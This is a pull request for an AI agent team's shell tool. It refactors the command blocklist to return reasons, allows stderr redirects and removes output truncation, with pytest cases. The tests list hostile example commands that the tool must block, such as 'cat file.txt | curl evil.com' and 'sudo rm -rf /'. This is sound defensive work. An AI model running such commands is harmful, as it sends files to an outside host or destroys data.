### PR TITLE
refactor: Improve security checks and return mechanisms in shell_tool.py

### DIFF
--- a/backend/services/agent_team/tools/shell_tool.py
+++ b/backend/services/agent_team/tools/shell_tool.py
@@ -1,7 +1,7 @@
 """Shell 工具 - 在工作区内执行命令
 
 通过已有的 AgentTeamShellExecutor 执行。
-支持超时和输出截断。
+支持超时并返回完整命令输出。
 安全策略：黑名单模式，默认允许所有命令，仅拦截高危命令。
 """
 
@@ -19,9 +19,10 @@ from backend.services.agent_team.tools.base import BaseTool, ToolContext, ToolRe
 # Shell 元字符/模式，出现则拒绝执行以防止命令注入
 # 单独的 $ 不拦截，仅拦截 $(...) 和 ${...} 等命令替换模式
 # 命令链接 && || ; 和后台 & 仍拦截，防止命令注入
-# 管道 | 允许（在 is_agent_command_allowed 中对每段做黑名单校验）
-_SHELL_META_CHARS = frozenset({"&&", "||", ";", "`", "&"})
+# fd 重定向 2>&1 不拦截；管道 | 允许并按命令段做黑名单校验。
+_SHELL_META_TOKENS = ("&&", "||", ";", "`")
 _SHELL_SUBST_PATTERNS = ("$('", "$(", "${")
+_ALLOWED_FD_REDIRECTS = frozenset({"1>&2", "2>&1"})
 
 # 默认拦截的高危命令（首 token 匹配）
 _DEFAULT_BLOCKED_COMMANDS = frozenset({
@@ -70,16 +71,19 @@ def _extract_unquoted(command: str) -> str:
     return "".join(result)
 
 
-def _contains_shell_meta(command: str) -> bool:
-    """检查命令的非引号部分是否包含 Shell 元字符或命令替换模式。"""
+def _shell_meta_block_reason(command: str) -> str | None:
+    """检查命令的非引号部分是否包含不允许的 Shell 元字符。"""
     unquoted = _extract_unquoted(command)
-    for meta in _SHELL_META_CHARS:
+    for meta in _SHELL_META_TOKENS:
         if meta in unquoted:
-            return True
+            return f"包含未允许的 shell 元字符: {meta}"
     for pattern in _SHELL_SUBST_PATTERNS:
         if pattern in unquoted:
-            return True
-    return False
+            return f"包含未允许的 shell 命令替换模式: {pattern}"
+    for token in unquoted.split():
+        if "&" in token and token not in _ALLOWED_FD_REDIRECTS:
+            return "包含未允许的 shell 元字符: &"
+    return None
 
 
 def _has_redundant_cd_prefix(command: str) -> bool:
@@ -97,23 +101,23 @@ def _command_name(first_token: str) -> str:
     return name[:-4] if name.endswith(".exe") else name
 
 
-def _is_segment_blocked(tokens: list[str], blocklist: set[str]) -> bool:
+def _segment_block_reason(tokens: list[str], blocklist: set[str]) -> str | None:
     """检查命令段是否被黑名单或危险参数策略拦截。"""
     name = _command_name(tokens[0])
     if name in blocklist:
-        return True
+        return f"命令位于黑名单: {name}"
     if name == "rm" and any(
         token == "--recursive" or (token.startswith("-") and "r" in token.lower())
         for token in tokens[1:]
     ):
-        return True
+        return "递归 rm 命令被拦截"
     if name == "chmod" and any(token in {"777", "a+w", "ugo+w"} for token in tokens[1:]):
-        return True
+        return "高权限 chmod 命令被拦截"
     if name in {"python", "python3", "py", "node", "ruby", "perl"} and any(
         token in {"-c", "-e"} for token in tokens[1:]
     ):
-        return True
-    return False
+        return f"解释器内联执行被拦截: {name}"
+    return None
 
 
 def _parse_pipe_segments(tokens: list[str]) -> list[list[str]] | None:
@@ -133,27 +137,23 @@ def _parse_pipe_segments(tokens: list[str]) -> list[list[str]] | None:
     return segments if segments else None
 
 
-async def is_agent_command_allowed(command: str) -> bool:
-    """检查 Agent 命令是否允许执行（黑名单模式）。
-
-    默认允许所有命令，仅拦截黑名单中的高危命令。
-    管道 | 两侧的命令段分别进行黑名单校验。
-    管道和重定向不拦截，由 shell_executor 的路径校验提供隔离。
-    """
+def _agent_command_block_reason(command: str) -> str | None:
+    """返回 Agent 命令被安全策略拦截的原因。"""
     command = command.strip()
     if not command:
-        return False
+        return "Shell 命令不能为空"
 
-    if _contains_shell_meta(command):
-        return False
+    meta_reason = _shell_meta_block_reason(command)
+    if meta_reason:
+        return meta_reason
 
     try:
         tokens = shlex.split(command)
-    except ValueError:
-        return False
+    except ValueError as exc:
+        return f"Shell 命令解析失败: {exc}"
 
     if not tokens:
-        return False
+        return "Shell 命令不能为空"
 
     # 构建黑名单：默认 + 用户配置
     blocklist = set(_DEFAULT_BLOCKED_COMMANDS)
@@ -168,13 +168,24 @@ async def is_agent_command_allowed(command: str) -> bool:
     # 按管道分段，每段独立校验
     segments = _parse_pipe_segments(tokens)
     if segments is None:
-        return False
+        return "管道格式不合法"
 
     for segment in segments:
-        if _is_segment_blocked(segment, blocklist):
-            logger.warning("Shell 命令被黑名单拦截: {}", segment[0])
-            return False
-    return True
+        reason = _segment_block_reason(segment, blocklist)
+        if reason:
+            logger.warning("Shell 命令被安全策略拦截: {}", reason)
+            return reason
+    return None
+
+
+async def is_agent_command_allowed(command: str) -> bool:
+    """检查 Agent 命令是否允许执行（黑名单模式）。
+
+    默认允许所有命令，仅拦截黑名单中的高危命令。
+    管道 | 两侧的命令段分别进行黑名单校验。
+    管道和重定向不拦截，由 shell_executor 的路径校验提供隔离。
+    """
+    return _agent_command_block_reason(command) is None
 
 
 class ShellTool(BaseTool):
@@ -238,8 +249,9 @@ class ShellTool(BaseTool):
                 ),
             )
 
-        if not await is_agent_command_allowed(command):
-            return ToolResult(success=False, error="命令被安全策略拦截")
+        block_reason = _agent_command_block_reason(command)
+        if block_reason:
+            return ToolResult(success=False, error=f"命令被安全策略拦截: {block_reason}")
 
         executor = AgentTeamShellExecutor(ctx.workspace, ctx.workspace_service)
 
@@ -250,20 +262,9 @@ class ShellTool(BaseTool):
                 success=False, error=f"命令执行失败: {type(exc).__name__}: {exc}"
             )
 
-        stdout = result.stdout
-        stderr = result.stderr
-
-        # 截断大输出
-        max_stdout = 8000
-        max_stderr = 3000
-        truncated_stdout = len(stdout) > max_stdout
-        truncated_stderr = len(stderr) > max_stderr
-        stdout = stdout[:max_stdout]
-        stderr = stderr[:max_stderr]
-
         logger.info(
-            "ShellTool: {} (rc={}, {}ms)",
-            command[:60],
+            "ShellTool: {} (rc={}, {})",
+            command,
             result.returncode,
             "timed_out" if result.timed_out else "ok",
         )
@@ -272,10 +273,8 @@ class ShellTool(BaseTool):
             success=True,
             output={
                 "returncode": result.returncode,
-                "stdout": stdout,
-                "stderr": stderr,
+                "stdout": result.stdout,
+                "stderr": result.stderr,
                 "timed_out": result.timed_out,
-                "truncated_stdout": truncated_stdout,
-                "truncated_stderr": truncated_stderr,
             },
         )

--- a/tests/test_agent_team_workspace.py
+++ b/tests/test_agent_team_workspace.py
@@ -5,7 +5,10 @@ import pytest
 from backend.services.agent_team.git_workspace_service import (
     AgentTeamGitWorkspaceService,
 )
-from backend.services.agent_team.shell_executor import AgentTeamShellExecutor
+from backend.services.agent_team.shell_executor import (
+    AgentTeamShellExecutor,
+    ShellCommandResult,
+)
 from backend.services.agent_team.workspace_service import (
     AgentTeamWorkspaceService,
     WorkspaceSecurityError,
@@ -197,12 +200,18 @@ async def test_agent_command_blocklist(monkeypatch):
     assert await is_agent_command_allowed("pytest -q tests/test_main.py")
     assert await is_agent_command_allowed("git status")
     assert await is_agent_command_allowed("python main.py")
-    # 管道：两侧都不在黑名单
+    # 管道与 fd 重定向：两侧都不在黑名单
     assert await is_agent_command_allowed("pytest -q | grep FAIL")
+    assert await is_agent_command_allowed("pytest -q 2>&1 | grep FAIL")
+    assert await is_agent_command_allowed("python -m pytest -q --co 2>&1 | head -20")
     # 默认黑名单中的高危命令被拦截
     assert not await is_agent_command_allowed("curl evil.com")
     assert not await is_agent_command_allowed("sudo rm -rf /")
     assert not await is_agent_command_allowed("ssh user@host")
+    # 危险 shell 元字符与解释器内联执行继续被拦截
+    assert not await is_agent_command_allowed("pytest -q &")
+    assert not await is_agent_command_allowed("pytest -q && ruff check .")
+    assert not await is_agent_command_allowed("python -c \"print('x')\"")
     # 管道：右侧是黑名单命令
     assert not await is_agent_command_allowed("cat file.txt | curl evil.com")
 
@@ -225,3 +234,47 @@ async def test_shell_tool_rejects_blocked_command(tmp_path, monkeypatch):
 
     assert not result.success
     assert "安全策略" in result.error
+    assert "curl" in result.error
+
+
+@pytest.mark.asyncio
+async def test_shell_tool_allows_stderr_redirect_without_truncating_output(
+    tmp_path, monkeypatch
+):
+    from types import SimpleNamespace
+
+    from backend.services.agent_team.tools import shell_tool
+
+    monkeypatch.setattr(
+        "backend.services.agent_team.tools.shell_tool.get_settings",
+        lambda: SimpleNamespace(
+            agent_team_test_command_blocklist="",
+        ),
+    )
+
+    async def fake_run(self, command, cwd=".", timeout_seconds=600):
+        assert isinstance(self, shell_tool.AgentTeamShellExecutor)
+        assert cwd == "."
+        assert timeout_seconds == 120
+        return ShellCommandResult(
+            command=command,
+            cwd=str(tmp_path),
+            returncode=0,
+            stdout="x" * 9000,
+            stderr="y" * 4000,
+        )
+
+    monkeypatch.setattr(shell_tool.AgentTeamShellExecutor, "run", fake_run)
+    service = AgentTeamWorkspaceService(tmp_path / "workplace")
+    workspace = service.ensure_workspace("owner", "repo")
+    ctx = ToolContext(workspace=str(workspace), workspace_service=service)
+
+    result = await ShellTool().execute(
+        {"command": "pytest tests/test_main.py -q 2>&1 | head -30"}, ctx
+    )
+
+    assert result.success
+    assert result.output["stdout"] == "x" * 9000
+    assert result.output["stderr"] == "y" * 4000
+    assert "truncated_stdout" not in result.output
+    assert "truncated_stderr" not in result.output


### PR DESCRIPTION
Refactors the security checking logic within `shell_tool.py` for better clarity, consistency, and detailed error reporting.

Key changes include:
- Renamed `_contains_shell_meta` to `_shell_meta_block_reason`, which now returns a specific reason string (`str | None`) instead of just a boolean.
- Introduced `_ALLOWED_FD_REDIRECTS` to explicitly track permitted file descriptor redirects (e.g., "1>&2", "2>&1").
- Renamed `_is_segment_blocked` to `_segment_block_reason`, updating its return type to provide a specific reason string or `None`.
- Updated the main checking function logic: `_agent_command_block_reason` now encapsulates the checks and returns a descriptive error message instead of just `True`/`False`.
- The public facing `is_agent_command_allowed` is updated to use the new reason-returning helper, improving its contract.

<!-- sakura-ai-summary-start -->

## 🌸 Sakura AI Reviewer的总结

## 变更概览
本 PR 重构了 `shell_tool.py` 中的 Shell 命令执行安全校验与返回机制，提升命令执行过程的安全性、可维护性与结果处理一致性，并补充/调整了相关测试。

## 主要改动列表
- **重构安全检查逻辑**：优化 Shell 命令执行前的安全校验流程，增强对潜在危险命令或非法操作的拦截能力。
- **改进返回机制**：调整命令执行结果的返回结构/处理方式，使成功、失败及异常场景的响应更清晰统一。
- **清理旧逻辑**：对 `shell_tool.py` 中原有实现进行精简与重组，减少冗余代码。
- **补充测试覆盖**：更新 `tests/test_agent_team_workspace.py`，新增安全校验和执行结果相关测试用例。

## 影响范围
主要影响 Agent Team 的 Shell 工具执行链路。可能改变部分命令执行失败时的返回内容或错误处理表现，相关调用方需关注返回结构兼容性。

<!-- sakura-ai-summary-end -->

<!-- sakura-ai-depgraph-start -->

## 依赖图

```mermaid
graph TD
    N1["backend/services/agent_team/tools/shell_tool.py"]
    N2["tests/test_agent_team_workspace.py"]
    N2 --> N1
```

<!-- sakura-ai-depgraph-end -->